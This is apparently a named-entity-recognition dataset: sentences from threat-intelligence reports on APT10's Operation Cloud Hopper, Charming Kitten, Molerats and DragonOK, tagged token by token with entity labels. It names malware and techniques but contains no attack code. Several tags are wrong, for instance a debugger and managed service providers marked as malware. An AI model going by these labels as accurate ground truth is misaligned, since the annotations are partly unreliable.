
O + +Sometimes O +, O +they O +aim O +at O +establishing O +a O +foothold O +on O +the O +target O +'s O +computer O +to O +gain O +access O +into O +their O +organization O +, O +but O +, O +based O +on O +our O +data O +, O +this O +is O +usually O +not O +their O +main O +objective O +, O +as O +opposed O +to O +other O +Iranian S-LOC +threat B-APT +groups E-APT +, O +such O +as O +Oilrig1 S-APT +and O +CopyKittens2 S-APT +. O + +A O +case O +of O +these O +obscure O +lines O +can O +be O +found O +in O +a O +blogpost O +published O +in O +coordination O +and O +parallel O +to O +this O +report O +- O +" O +Flying B-APT +Kitten E-APT +to O +Rocket B-APT +Kitten E-APT +, O +A O +Case O +of O +Ambiguity O +and O +Shared O +Code O +" O +3 O +by O +Collin O +Anderson O +and O +Claudio O +Guarnieri O +. O + +FireEye S-SECTEAM +'s O +publication O +of O +" O +Operation B-ACT +Saffron I-ACT +Rose E-ACT +" O +report O +, O +which O +described O +Flying B-APT +Kitten E-APT +'s O +operations O +against O +aviation B-IDTY +firms E-IDTY +, O +led O +to O +the O +dismantling O +of O +Flying B-APT +Kitten E-APT +'s O +infrastructure O +and O +the O +apparent O +end O +of O +its O +activities S-ACT +. O + +To O +sum O +up O +, O +the O +HBO O +hacker S-APT +- O +Behzad B-APT +Mesri E-APT +is O +a O +member O +of O +Turk B-APT +Black I-APT +Hat E-APT +along O +with O +ArYaIeIrAn S-APT +, O +who O +provides O +infrastructure O +for O +Charming B-ACT +Kitten I-ACT +activity E-ACT +via O +PersianDNS S-MAL +/ O +Mahanserver S-MAL +together O +with O +Mohammad O +Rasoul O +Akbari O +, O +who O +is O +a O +Facebook S-IDTY +friend O +of O +Behzad B-APT +Mesri E-APT +'s O +. O + +Charming B-APT +kitten E-APT +regularly O +target O +international O +media S-IDTY +outlets O +with O +Persian-language O +services O +. 
O + +It O +was O +a O +decoy O +to O +make O +visitor O +download O +a O +" O +Flash S-TOOL +Player O +" O +, O +which O +was O +in O +fact O +DownPaper S-MAL +malware S-MAL +, O +analyzed O +later O +in O +this O +report O +. O + +In O +addition O +to O +using O +PlugX S-MAL +and O +Poison B-MAL +Ivy E-MAL +( O +PIVY S-MAL +) O +, O +both O +known O +to O +be O +used O +by O +the O +group O +, O +they O +also O +used O +a O +new O +Trojan S-MAL +called O +" O +ChChes S-MAL +" O +by O +the O +Japan B-SECTEAM +Computer I-SECTEAM +Emergency I-SECTEAM +Response I-SECTEAM +Team I-SECTEAM +Coordination I-SECTEAM +Center E-SECTEAM +( O +JPCERT S-SECTEAM +) O +. O + +Wapack S-SECTEAM +labs O +also O +observed O +a O +similar O +sample O +targeting O +Japan S-LOC +in O +November S-TIME +. O + +MenuPass S-APT +spoofed O +several O +sender O +email S-ACT +addresses O +to O +send O +spear B-ACT +phishing E-ACT +emails S-TOOL +, O +most O +notably O +public O +addresses O +associated O +with O +the O +Sasakawa B-IDTY +Peace I-IDTY +Foundation E-IDTY +and O +The O +White B-IDTY +House E-IDTY +. O + +menuPass O +typically O +makes O +use O +of O +a O +mix O +of O +DDNS B-MAL +and I-MAL +actor-registered I-MAL +domains E-MAL +in O +their O +attack B-ACT +campaigns E-ACT +. O + +There O +is O +not O +much O +public O +information O +about O +the O +APT B-ACT +campaign E-ACT +called O +menuPass S-APT +( O +also O +known O +as O +Stone B-APT +Panda E-APT +and O +APT10 S-APT +) O +. O + +A O +paper O +from O +FireEye S-SECTEAM +in O +2013 S-TIME +on O +several O +campaigns S-ACT +using O +PIVY S-MAL +included O +menuPass O +as O +one O +of O +them O +. O + +Believed O +to O +have O +started O +activity O +in O +2009 S-TIME +and O +to O +originate O +from O +China S-LOC +, O +the O +group O +initially O +was O +known O +for O +targeting O +US S-LOC +and O +overseas O +defense B-IDTY +contractors E-IDTY +but O +broadened O +their O +targeting O +as O +time O +passed O +. 
O + +menuPass O +has O +targeted O +individuals O +and O +organizations O +in O +Japan S-LOC +since O +at O +least O +2014 S-TIME +, O +and O +as O +the O +same O +organizations O +and O +academics O +were O +largely O +targeted O +each O +month O +in O +these O +attacks O +, O +it O +further O +shows O +menuPass O +is O +persistent O +in O +attempts O +to O +compromise O +their O +targets O +. O + +menuPass O +also O +heavily O +favors O +spear B-ACT +phishing E-ACT +, O +and O +so O +takes O +steps O +to O +socially O +engineer O +their O +spear B-ACT +phishes E-ACT +for O +maximum O +appearance O +of O +legitimacy O +. O + +menuPass O +is O +an O +ongoing O +APT B-ACT +campaign E-ACT +with O +a O +broad O +range O +of O +targets O +and O +will O +likely O +continue O +to O +target O +Japan S-LOC +in O +the O +future O +. O + +ChopShop1 S-FILE +is O +a O +new O +framework O +developed O +by O +the O +MITRE B-IDTY +Corporation E-IDTY +for O +network-based O +protocol O +decoders O +that O +enable O +security O +professionals O +to O +understand O +actual O +commands O +issued O +by O +human O +operators O +controlling O +endpoints O +. O + +PyCommands O +, O +meanwhile O +, O +are O +Python S-TOOL +scripts O +that O +automate O +tasks O +for O +Immunity B-MAL +Debugger E-MAL +, O +a O +popular O +tool O +for O +reverse-engineering O +malware O +binaries O +. O + +Poison B-MAL +Ivy E-MAL +is O +a O +remote O +access O +tool O +that O +is O +freely O +available O +for O +download O +from O +its O +official O +web O +site O +at O +www.poisonivy-rat.com S-DOM +. O + +First O +released O +in O +2005 S-TIME +, O +the O +tool O +has O +gone O +unchanged O +since O +2008 S-TIME +with O +v O +ersion O +2.3.2 O +. 
O + +Poison B-MAL +Ivy E-MAL +includes O +features O +common O +to O +most O +Windows-based S-OS +RATs S-MAL +, O +including O +key O +logging O +, O +screen O +capturing O +, O +video O +capturing O +, O +file O +transfers O +, O +system O +administration O +, O +password O +theft O +, O +and O +traffic O +relaying O +. O + +APT40 S-APT +was O +previously O +reported O +as O +TEMP.Periscope S-APT +and O +TEMP.Jumper S-APT +. O + +They O +move O +laterally O +and O +escalate O +system O +privileges O +to O +extract O +sensitive O +information O +— O +whenever O +the O +attacker S-APT +wants O +to O +do O +so.4 O +,5 O +Because O +some O +RATs S-MAL +used O +in O +targeted B-ACT +attacks E-ACT +are O +widely O +available O +, O +determining O +whether O +an O +attack O +is O +part O +of O +a O +broader O +APT B-ACT +campaign E-ACT +can O +be O +difficult O +. O + +In O +2011 S-TIME +, O +three O +years O +after O +the O +most O +recent O +release O +of O +PIVY S-MAL +, O +attackers S-APT +used O +the O +RAT S-MAL +to O +compromise O +security B-IDTY +firm I-IDTY +RSA E-IDTY +and O +steal O +data O +about O +its O +SecureID O +authentication O +system O +. O + +PIVY S-MAL +also O +played O +a O +key O +role O +in O +the O +2011 B-ACT +campaign E-ACT +known O +as O +Nitro O +that O +targeted O +chemical B-IDTY +makers E-IDTY +, O +government B-IDTY +agencies E-IDTY +, O +defense B-IDTY +contractors E-IDTY +, O +and O +human O +rights O +groups.10,11 O +Still O +active O +a O +year O +later O +, O +the O +Nitro O +attackers S-APT +used O +a O +zero-day S-VULNAME +vulnerability O +in O +Java O +to O +deploy O +PIVY S-MAL +in O +2012 S-TIME +. O + +Just O +recently O +, O +PIVY S-MAL +was O +the O +payload O +of O +a O +zero-day S-VULNAME +exploit S-VULNAME +in O +Internet O +Explorer O +used O +in O +what O +is O +known O +as O +a O +" O +strategic B-ACT +web I-ACT +compromise E-ACT +" O +attack O +against O +visitors O +to O +a O +U.S. 
S-LOC +government O +website O +and O +a O +variety O +of O +others O +. O + +The O +Poison B-MAL +Ivy E-MAL +builder O +kit O +allows O +attackers S-APT +to O +customize O +and O +build O +their O +own O +PIVY O +server O +, O +which O +is O +delivered O +as O +mobile O +code O +to O +a O +target O +that O +has O +been O +compromised O +, O +typically O +using O +social B-IDTY +engineering E-IDTY +. O + +Attackers S-APT +can O +point O +and O +click O +their O +ACT O +through O +a O +compromised O +network O +and O +exfiltrate O +data O +. O + +Commodity O +RATs S-MAL +also O +complicate O +efforts O +by O +security O +professionals O +to O +correlate O +a O +threat O +actor O +'s O +activity O +over O +time—attackers O +can O +hide O +in O +the O +sea O +of O +malicious B-ACT +activity E-ACT +that O +also O +uses O +Poison B-MAL +Ivy-based I-MAL +malware E-MAL +. O + +This O +report O +is O +an O +initial O +public O +release O +of O +research O +PwC B-SECTEAM +UK E-SECTEAM +and O +BAE B-SECTEAM +Systems E-SECTEAM +have O +conducted O +into O +new O +, O +sustained O +global O +campaigns S-ACT +by O +an O +established O +threat O +actor O +against O +managed B-IDTY +IT I-IDTY +service I-IDTY +providers E-IDTY +and O +their O +clients O +as O +well O +as O +several O +directly O +targeted O +organisations O +in O +Japan S-LOC +. O + +Since O +late B-TIME +2016 E-TIME +, O +PwC B-SECTEAM +UK E-SECTEAM +and O +BAE B-SECTEAM +Systems E-SECTEAM +have O +been O +assisting O +victims O +of O +a O +new O +cyber B-ACT +espionage I-ACT +campaign E-ACT +conducted O +by O +APT10 S-APT +. 
O + +The O +campaign O +, O +which O +we O +refer O +to O +as O +Operation B-ACT +Cloud I-ACT +Hopper E-ACT +, O +has O +targeted O +managed B-IDTY +IT I-IDTY +service I-IDTY +providers E-IDTY +( O +MSPs S-IDTY +) O +, O +allowing O +APT10 S-APT +unprecedented O +potential O +access O +to O +the O +intellectual O +property O +and O +sensitive O +data O +of O +those O +MSPs S-IDTY +and O +their O +clients O +globally O +. O + +APT10 S-APT +ceased O +its O +use O +of O +the O +Poison B-MAL +Ivy I-MAL +malware I-MAL +family E-MAL +after O +a O +2013 O +FireEye S-SECTEAM +report O +, O +which O +comprehensively O +detailed O +the O +malware O +'s O +functionality O +and O +features O +, O +and O +its O +use O +by O +several O +China-based S-LOC +threat O +actors S-APT +, O +including O +APT10 S-APT +. O + +APT10 S-APT +primarily O +used O +PlugX S-MAL +malware S-MAL +from O +2014 S-TIME +to O +2016 S-TIME +, O +progressively O +improving O +and O +deploying O +newer O +versions O +, O +while O +simultaneously O +standardising O +their O +command O +and O +control O +function O +. O + +PwC B-SECTEAM +UK E-SECTEAM +and O +BAE B-SECTEAM +Systems E-SECTEAM +assess O +it O +is O +highly O +likely O +that O +APT10 S-APT +is O +a O +China-based S-LOC +threat O +actor O +with O +a O +focus O +on O +espionage S-ACT +and O +wide O +ranging O +information O +collection O +. O + +APT10 S-APT +is O +known O +to O +have O +exfiltrated O +a O +high O +volume O +of O +data O +from O +multiple O +victims O +, O +exploiting O +compromised O +MSP B-MAL +networks E-MAL +, O +and O +those O +of O +their O +customers S-IDTY +, O +to O +stealthily O +move O +this O +data O +around O +the O +world O +. 
O + +APT10 S-APT +, O +a O +name O +originally O +coined O +by O +FireEye S-SECTEAM +, O +is O +also O +referred O +to O +as O +Red B-APT +Apollo E-APT +by O +PwC B-SECTEAM +UK E-SECTEAM +, O +CVNX S-APT +by O +BAE B-SECTEAM +Systems E-SECTEAM +, O +Stone B-APT +Panda E-APT +by O +CrowdStrike S-SECTEAM +, O +and O +menuPass B-APT +Team E-APT +more O +broadly O +in O +the O +public O +domain O +. O + +The O +threat O +actor O +has O +previously O +been O +the O +subject O +of O +a O +range O +of O +open O +source O +reporting O +, O +including O +most O +notably O +a O +report O +by O +FireEye S-SECTEAM +comprehensively O +detailing O +the O +threat O +actor O +'s O +use O +of O +the O +Poison B-MAL +Ivy I-MAL +malware I-MAL +family E-MAL +and O +blog O +posts O +by O +Trend B-SECTEAM +Micro3 E-SECTEAM +similarly O +detailing O +the O +use O +of O +EvilGrab S-MAL +malware S-MAL +. O + +The O +threat O +actor O +has O +previously O +been O +the O +subject O +of O +a O +range O +of O +open O +source O +reporting O +, O +including O +most O +notably O +a O +report O +by O +FireEye S-SECTEAM +comprehensively O +detailing O +the O +threat O +actor O +'s O +use O +of O +the O +Poison B-MAL +Ivy I-MAL +malware I-MAL +family E-MAL +and O +blog O +posts O +by O +Trend B-SECTEAM +Micro E-SECTEAM +similarly O +detailing O +the O +use O +of O +EvilGrab S-MAL +malware S-MAL +. O + +APT10 S-APT +has O +been O +in O +operation O +since O +at O +least O +2009 S-TIME +, O +and O +has O +evolved O +its O +targeting O +from O +an O +early O +focus O +on O +the O +US S-LOC +defence O +industrial O +base O +( O +DIB O +)1 O +and O +the O +technology S-IDTY +and O +telecommunications B-IDTY +sector E-IDTY +, O +to O +a O +widespread O +compromise O +of O +multiple O +industries O +and O +sectors O +across O +the O +globe O +, O +most O +recently O +with O +a O +focus O +on O +MSPs S-IDTY +. 
O + +The O +research O +and O +ongoing O +tracking O +of O +APT10 S-APT +by O +both O +PwC B-SECTEAM +UK E-SECTEAM +and O +BAE S-SECTEAM +. O + +APT10 S-APT +has O +been O +in O +operation O +since O +at O +least O +2009 S-TIME +, O +and O +has O +evolved O +its O +targeting O +from O +an O +early O +focus O +on O +the O +US S-LOC +defence O +industrial O +base O +( O +DIB O +) O +and O +the O +technology S-IDTY +and O +telecommunications B-IDTY +sector E-IDTY +, O +to O +a O +widespread O +compromise O +of O +multiple O +industries O +and O +sectors O +across O +the O +globe O +, O +most O +recently O +with O +a O +focus O +on O +MSPs S-IDTY +. O + +PwC B-SECTEAM +UK E-SECTEAM +has O +been O +engaged O +in O +supporting O +investigations O +linked O +to O +APT10 S-APT +compromises O +. O + +As O +a O +result O +of O +our O +analysis O +of O +APT10 S-APT +'s O +activities S-ACT +, O +we O +believe O +that O +it O +almost O +certainly O +benefits O +from O +significant O +staffing O +and O +logistical O +resources O +, O +which O +have O +increased O +over O +the O +last O +three O +years O +, O +with O +a O +significant O +step-change O +in O +2016 S-TIME +. O + +Due O +to O +the O +scale O +of O +the O +threat O +actor O +'s O +operations O +throughout O +2016 S-TIME +and O +2017 S-TIME +, O +we O +similarly O +assess O +it O +currently O +comprises O +multiple O +teams O +, O +each O +responsible O +for O +a O +different O +section O +of O +the O +day-to-day O +operations O +, O +namely B-ACT +domain I-ACT +registration E-ACT +, O +infrastructure O +management O +, O +malware O +development O +, O +target O +operations O +, O +and O +analysis O +. O + +APT10 S-APT +withdrew O +from O +direct O +targeting O +using O +Poison B-MAL +Ivy E-MAL +in O +2013 S-TIME +and O +conducted O +its O +first O +known O +retooling O +operation O +, O +upgrading O +its O +capabilities O +and O +replatforming O +to O +use O +PlugX S-MAL +. 
O + +It O +is O +highly O +likely O +that O +this O +is O +due O +to O +the O +release O +of O +the O +2013 O +FireEye S-SECTEAM +report O +. O + +Our O +report O +will O +detail O +the O +most O +recent O +campaigns S-ACT +conducted O +by O +APT10 S-APT +, O +including O +the O +sustained O +targeting O +of O +MSPs S-IDTY +, O +which O +we O +have O +named O +Operation B-ACT +Cloud I-ACT +Hopper E-ACT +, O +and O +the O +targeting O +of O +a O +number O +of O +Japanese S-LOC +institutions S-IDTY +. O + +MSPs S-IDTY +therefore O +represent O +a O +high-payoff O +target O +for O +espionagefocused O +threat O +actors S-APT +such O +as O +APT10 S-APT +. O + +Given O +the O +level O +of O +client O +network O +access O +MSPs S-IDTY +have O +, O +once O +APT10 S-APT +has O +gained O +access O +to O +a O +MSP S-MAL +, O +it O +is O +likely O +to O +be O +relatively O +straightforward O +to O +exploit S-VULNAME +this O +and O +move O +laterally O +onto O +the O +networks O +of O +potentially O +thousands O +of O +other O +victims O +. O + +This O +, O +in O +turn O +, O +would O +provide O +access O +to O +a O +larger O +amount O +of O +intellectual O +property O +and O +sensitive O +data O +. O + +APT10 S-APT +has O +been O +observed O +to O +exfiltrate O +stolen O +intellectual O +property O +via O +the O +MSPs S-IDTY +, O +hence O +evading O +local O +network O +defences O +. O + +The O +command O +and O +control O +( O +C2 S-TOOL +) O +infrastructure O +chosen O +by O +APT10 S-APT +for O +Operation B-ACT +Cloud I-ACT +Hopper E-ACT +is O +predominantly O +referenced O +using O +dynamic-DNS B-MAL +domains E-MAL +. O + +Several O +of O +these O +provide O +enterprise O +services O +or O +cloud O +hosting O +, O +supporting O +our O +assessment O +that O +APT10 S-APT +are O +almost O +certainly O +targeting O +MSPs S-IDTY +. 
O + +The O +13th O +FYP O +was O +released O +in O +March B-TIME +2016 E-TIME +and O +the O +sectors O +and O +organisations O +known O +to O +be O +targeted O +by O +APT10 S-APT +are O +broadly O +in O +line O +with O +the O +strategic O +aims O +documented O +in O +this O +plan O +. O +These O +aims O +outlined O +in O +the O +FYP O +will O +largely O +dictate O +the O +growth O +of O +businesses S-IDTY +in O +China S-LOC +and O +are O +, O +therefore O +, O +likely O +to O +also O +form O +part O +of O +Chinese S-LOC +companies S-IDTY +' O +business O +strategies O +. O + +APT10 S-APT +has O +, O +in O +the O +past O +, O +primarily O +been O +known O +for O +its O +targeting O +of O +government S-IDTY +and O +US S-LOC +defence O +industrial O +base O +organisations O +, O +with O +the O +earliest O +known O +date O +of O +its O +activity O +being O +in O +December B-TIME +2009 E-TIME +. O + +Observed O +APT10 S-APT +targeting O +is O +in O +line O +with O +many O +of O +the O +historic O +compromises O +we O +have O +outlined O +previously O +as O +originating O +from O +China S-LOC +. O + +In O +line O +with O +commonly O +used O +APT B-APT +actor E-APT +methodologies O +, O +the O +threat O +actor O +aligns O +its O +decoy B-MAL +documents E-MAL +to O +a O +topic O +of O +interest O +relevant O +to O +the O +recipient O +. O + +This O +section O +details O +changes O +made O +to O +APT10 S-APT +tools O +, O +techniques O +and O +procedures O +( O +TTPs O +) O +post-2014 S-TIME +, O +following O +its O +shift O +from O +Poison B-MAL +Ivy E-MAL +to O +PlugX S-MAL +. O + +We O +have O +observed O +that O +in O +cases O +where O +APT10 S-APT +has O +infiltrated O +a O +target O +via O +an O +MSP S-MAL +, O +it O +continues O +to O +use O +the O +MSPs S-IDTY +credentials O +. 
O + +In O +order O +to O +gain O +any O +further O +credentials O +, O +APT10 S-APT +will O +usually O +deploy O +credential O +theft O +tools O +such O +as O +mimikatz S-MAL +or O +PwDump S-MAL +, O +sometimes O +using O +DLL B-MAL +load I-MAL +order I-MAL +hijacking E-MAL +, O +to O +use O +against O +a O +domain O +controller O +, O +explained O +further O +in O +Annex O +B O +. O + +APT10 S-APT +achieves O +persistence O +on O +its O +targets O +primarily O +by O +using O +scheduled B-MAL +tasks E-MAL +or O +Windows B-MAL +services E-MAL +in O +order O +to O +ensure O +the O +malware O +remains O +active O +regardless O +of O +system O +reboots O +. O + +For O +example O +, O +in O +addition O +to O +compromising O +high O +value O +domain O +controllers O +and O +security O +servers O +, O +the O +threat O +actor O +has O +also O +been O +observed O +identifying O +and O +subsequently O +installing O +malware O +on O +low O +profile O +systems O +that O +provide O +non-critical O +support O +functions O +to O +the O +business O +, O +and O +are O +thus O +less O +likely O +to O +draw O +the O +attention O +of O +system O +administrators O +. O + +In O +the O +majority O +of O +instances O +APT10 S-APT +used O +either O +a O +reverse B-MAL +shell E-MAL +or O +RDP S-MAL +connection O +to O +install O +its O +malware O +; O +the O +actor S-APT +also O +uses O +these O +methods O +to O +propagate O +across O +the O +network O +. O + +The O +tactical O +malware O +, O +historically O +EvilGrab S-MAL +, O +and O +now O +ChChes S-MAL +( O +and O +likely O +also O +RedLeaves S-MAL +) O +, O +is O +designed O +to O +be O +lightweight O +and O +disposable O +, O +often O +being O +delivered O +through O +spear B-ACT +phishing E-ACT +. O + +Once O +executed O +, O +tactical O +malware O +contains O +the O +capability O +to O +profile O +the O +network S-IDTY +and O +manoeuvre O +through O +it O +to O +identify O +a O +key O +system O +of O +interest O +. 
O + +We O +have O +also O +observed O +APT10 S-APT +use O +DLL B-ACT +search I-ACT +order I-ACT +hijacking I-ACT +and I-ACT +sideloading E-ACT +, O +to O +execute O +some O +modified O +versions O +of O +open-source O +tools O +. O + +For O +example O +, O +PwC B-SECTEAM +UK E-SECTEAM +has O +observed O +APT10 S-APT +compiling O +DLLs O +out O +of O +tools O +, O +such O +as O +Mimikatz S-MAL +and O +PwDump6 S-MAL +, O +and O +using O +legitimate O +, O +signed B-MAL +software E-MAL +, O +such O +as O +Windows S-OS +Defender O +to O +load O +the O +malicious O +payloads O +. O + +During O +our O +analysis O +of O +victim O +networks O +, O +we O +were O +able O +to O +observe O +APT10 S-APT +once O +again O +initiate O +a O +retooling O +cycle O +in O +late B-TIME +2016 E-TIME +. O + +We O +observed O +the O +deployment O +and O +testing O +of O +multiple O +versions O +of O +Quasar S-MAL +malware S-MAL +, O +and O +the O +introduction O +of O +the O +bespoke O +malware O +families O +ChChes S-MAL +and O +RedLeaves S-MAL +. O + +APT10 S-APT +is O +a O +constantly O +evolving O +, O +highly O +persistent O +China-based S-LOC +threat O +actor O +that O +has O +an O +ambitious O +and O +unprecedented O +collection O +programme O +against O +a O +broad O +spectrum O +of O +sectors O +, O +enabled O +by O +its O +strategic O +targeting O +. O + +Since O +exposure O +of O +its O +operations O +in O +2013 S-TIME +, O +APT10 S-APT +has O +made O +a O +number O +of O +significant O +changes O +intended O +to O +thwart O +detection O +of O +its O +campaigns S-ACT +. O + +PwC B-SECTEAM +UK E-SECTEAM +and O +BAE B-SECTEAM +Systems E-SECTEAM +, O +working O +closely O +with O +industry S-IDTY +and O +government S-IDTY +, O +have O +uncovered O +a O +new O +, O +unparallelled O +campaign O +which O +we O +refer O +to O +as O +Operation B-ACT +Cloud I-ACT +Hopper E-ACT +. 
O + +This O +operation O +has O +targeted O +managed B-IDTY +IT I-IDTY +service I-IDTY +providers E-IDTY +, O +the O +compromise O +of O +which O +provides O +APT10 S-APT +with O +potential O +access O +to O +thousands O +of O +further O +victims O +. O + +An O +additional O +campaign O +has O +also O +been O +observed O +targeting O +Japanese S-LOC +entities O +. O + +APT10 S-APT +'s O +malware O +toolbox O +shows O +a O +clear O +evolution O +from O +malware O +commonly O +associated O +with O +China-based S-LOC +threat O +actors S-APT +towards O +bespoke O +in-house O +malware O +that O +has O +been O +used O +in O +more O +recent O +campaigns S-ACT +; O +this O +is O +indicative O +of O +APT10 S-APT +'s O +increasing O +sophistication O +, O +which O +is O +highly O +likely O +to O +continue O +. O + +The O +threat O +actor O +'s O +known O +working O +hours O +align O +to O +Chinese S-LOC +Standard O +TIME O +( O +CST O +) O +and O +its O +targeting O +corresponds O +to O +that O +of O +other O +known O +China-based S-LOC +threat O +actors S-APT +, O +which O +supports O +our O +assessment O +that O +these O +campaigns S-ACT +are O +conducted O +by O +APT10 S-APT +. O + +APT10 S-APT +( O +MenuPass B-APT +Group E-APT +) O +is O +a O +Chinese S-LOC +cyber B-ACT +espionage I-ACT +group O +that O +FireEye S-SECTEAM +has O +tracked O +since O +2009 S-TIME +. O + +Its O +targets O +include O +the O +military B-IDTY +organizations E-IDTY +and O +governments S-IDTY +of O +countries O +with O +national O +interests O +in O +the O +South B-LOC +China I-LOC +Sea E-LOC +, O +including O +some O +within O +the O +U.S. S-LOC +defense B-IDTY +industrial I-IDTY +base E-IDTY +. 
O + +Moafee S-APT +may O +have O +chosen O +its O +targets O +based O +on O +the O +rich O +resources O +of O +South B-LOC +China I-LOC +Sea E-LOC +region O +– O +the O +world O +'s O +second O +business O +sea-lane O +, O +according O +to O +Wikipedia O +– O +including O +rare O +earth O +metals O +, O +crude O +oil S-IDTY +, O +and O +natural O +gas S-IDTY +. O + +DragonOK S-APT +appears O +to O +operate O +out O +of O +China S-LOC +'s O +Jiangsu B-LOC +Province E-LOC +. O + +Moafee S-APT +and O +DragonOK S-APT +both O +use O +a O +well-known O +proxy O +tool O +– O +HUC B-MAL +Packet I-MAL +Transmit I-MAL +MAL E-MAL +( O +HTRAN S-MAL +) O +– O +to O +disguise O +their O +geographical O +locations O +. O + +However O +, O +FireEye S-SECTEAM +researchers O +do O +not O +have O +enough O +insight O +to O +reliably O +report O +a O +definitive O +connection O +to O +the O +Moafee S-APT +and O +DragonOK B-APT +groups E-APT +. O + +Both O +Moafee S-APT +and O +DragonOK S-APT +favor O +spear-phishing S-ACT +emails S-TOOL +as O +an O +attack O +vector O +, O +often O +employing O +a O +decoy O +to O +deceive O +the O +victim O +. O + +Attachments S-FILE +are O +typically O +sent O +as O +an O +executable O +file O +embedded O +in O +a O +ZIP B-ACT +archive E-ACT +or O +a O +password-protected B-ACT +Microsoft I-ACT +Office I-ACT +document E-ACT +. O + +We O +observed O +Moafee S-APT +running O +HTRAN S-MAL +proxies O +on O +their O +multiple O +Command O +and O +Control O +( O +C2 S-TOOL +) O +servers O +– O +all O +operated O +on O +CHINANET O +, O +and O +hosted O +in O +Guangdong B-LOC +Province E-LOC +. O + +Like O +the O +Moafee B-APT +group E-APT +, O +we O +observed O +DragonOK S-APT +running O +HTRAN S-MAL +to O +proxy O +their O +C2 S-TOOL +servers O +, O +which O +are O +also O +operated O +on O +CHINANET O +but O +are O +hosted O +in O +the O +Jiangsu B-LOC +Province E-LOC +. 
O + +Primarily O +focused O +on O +governments S-IDTY +and O +military O +operations O +of O +countries O +with O +interests O +in O +the O +South B-LOC +China I-LOC +Sea E-LOC +, O +Moafee S-APT +likely O +chooses O +its O +targets O +based O +on O +region O +'s O +rich O +natural O +resources O +. O + +By O +targeting O +high-tech S-IDTY +and O +manufacturing S-IDTY +operations O +in O +Japan S-LOC +and O +Taiwan S-LOC +, O +DragonOK S-APT +may O +be O +acquiring O +trade O +secrets O +for O +a O +competitive O +economic S-IDTY +advantage O +. O + +Security O +researchers O +subsequently O +linked O +these O +attacks O +to O +a O +broader O +, O +yearlong O +campaign O +that O +targeted O +not O +just O +Israelis S-LOC +but O +Palestinians O +as O +well O +. O + +and O +as O +discovered O +later O +, O +even O +the O +U.S. S-LOC +and O +UK S-LOC +governments S-IDTY +. O + +The O +second O +group O +, O +known O +as O +DragonOK S-APT +, O +targets O +high-tech S-IDTY +and O +manufacturing B-IDTY +companies E-IDTY +in O +Japan S-LOC +and O +Taiwan S-LOC +. O + +In O +2012 S-TIME +, O +the O +Molerats B-ACT +attacks E-ACT +appeared O +to O +rely O +heavily O +on O +the O +XtremeRAT S-MAL +, O +a O +freely O +available O +tool O +that O +is O +popular O +with O +attackers S-APT +based O +in O +the O +Middle B-LOC +East E-LOC +. O + +But O +the O +group O +has O +also O +used O +Poison B-MAL +Ivy E-MAL +( O +PIVY S-MAL +) O +, O +a O +RAT S-MAL +more O +commonly O +associated O +with O +threat O +actors S-APT +in O +China S-LOC +— O +so O +much O +so O +that O +PIVY S-MAL +has O +, O +inaccurately O +, O +become O +synonymous O +with O +all O +APT B-ACT +attacks E-ACT +linked O +to O +China S-LOC +. O + +This O +blog O +post O +analyzes O +several O +recent O +Molerats B-ACT +attacks E-ACT +that O +deployed O +PIVY S-MAL +against O +targets O +in O +the O +Middle B-LOC +East E-LOC +and O +in O +the O +U.S. 
S-LOC +We O +also O +examine O +additional O +PIVY B-ACT +attacks E-ACT +that O +leverage O +Arabic-language O +content O +related O +to O +the O +ongoing O +crisis O +in O +Egypt S-LOC +and O +the O +wider O +Middle B-LOC +East E-LOC +to O +lure O +targets O +into O +opening O +malicious B-FILE +files E-FILE +. O + +We O +do O +not O +know O +whether O +using O +PIVY S-MAL +is O +an O +attempt O +by O +those O +behind O +the O +Molerats B-ACT +campaign E-ACT +to O +frame O +China-based S-LOC +threat O +actors S-APT +for O +their O +attacks O +or O +simply O +evidence O +that O +they O +have O +added O +another O +effective O +, O +publicly-available O +RAT S-MAL +to O +its O +arsenal O +. O + +We O +observed O +several O +attacks O +in O +June S-TIME +and O +July B-TIME +2013 E-TIME +against O +targets O +in O +the O +Middle B-LOC +East E-LOC +and O +the O +U.S. S-LOC +that O +dropped O +a O +PIVY S-MAL +payload O +that O +connected O +to O +command-and-control S-TOOL +( O +CnC S-TOOL +) O +infrastructure O +used O +by O +the O +Molerats S-APT +attackers S-APT +. O + +The O +archive O +contains O +an O +.exe B-FILE +file E-FILE +, O +sometimes O +disguised O +as O +a O +Microsoft B-FILE +Word I-FILE +file E-FILE +, O +a O +video O +, O +or O +another O +file O +format O +, O +using O +the O +corresponding O +icon O +. O + +In O +addition O +to O +DustySky S-MAL +, O +the O +attackers S-APT +use O +publicly B-MAL +available I-MAL +tools E-MAL +such O +as O +the O +following O +Remote B-MAL +Administration I-MAL +Tools E-MAL +( O +RAT S-MAL +) O +: O +Poison B-MAL +Ivy E-MAL +, O +Nano B-MAL +Core E-MAL +, O +XtremeRAT S-MAL +, O +DarkComet S-MAL +and O +Spy-Net S-MAL +. O + +DustySky S-MAL +( O +called O +" O +NeD B-MAL +Worm E-MAL +" O +by O +its O +developer O +) O +is O +a O +multi-stage O +malware O +in O +use O +since O +May B-TIME +2015 E-TIME +. 
O + +It O +is O +in O +use O +by O +the O +Molerats S-APT +( O +aka O +Gaza B-APT +cybergang E-APT +) O +, O +a O +politically S-IDTY +motivated O +group O +whose O +main O +objective O +, O +we O +believe O +, O +is O +intelligence O +gathering O +. O + +Operating O +since O +2012 S-TIME +, O +the O +Molerats B-APT +group E-APT +'s O +activity O +has O +been O +reported O +by O +Norman S-SECTEAM +, O +Kaspersky S-SECTEAM +, O +FireEye S-SECTEAM +, O +and O +PwC S-SECTEAM +. O + +DustySky S-MAL +has O +been O +developed O +and O +used O +since O +May B-TIME +2015 E-TIME +by O +Molerats S-APT +( O +aka O +" O +Gaza B-APT +cybergang E-APT +" O +) O +, O +a O +terrorist O +group O +whose O +main O +objective O +in O +this O +campaign O +is O +intelligence O +gathering O +. O + +Most O +targets O +are O +from O +the O +Middle B-LOC +East E-LOC +: O +Israel S-LOC +, O +Egypt S-LOC +, O +Saudi B-LOC +Arabia E-LOC +, O +United B-LOC +Arab I-LOC +Emirates E-LOC +and O +Iraq S-LOC +. O + +The O +United B-LOC +States E-LOC +and O +countries O +in O +Europe S-LOC +are O +targeted O +as O +well O +. O + +The O +sample O +analyzed O +is O +f589827c4cf94662544066b80bfda6ab O +from O +late B-TIME +August I-TIME +2015 E-TIME +. O + +The O +MuddyWater B-ACT +attacks E-ACT +are O +primarily O +against O +Middle B-LOC +Eastern E-LOC +nations O +. O + +However O +, O +we O +have O +also O +observed O +attacks O +against O +surrounding O +nations O +and O +beyond O +, O +including O +targets O +in O +India S-LOC +and O +the O +USA S-LOC 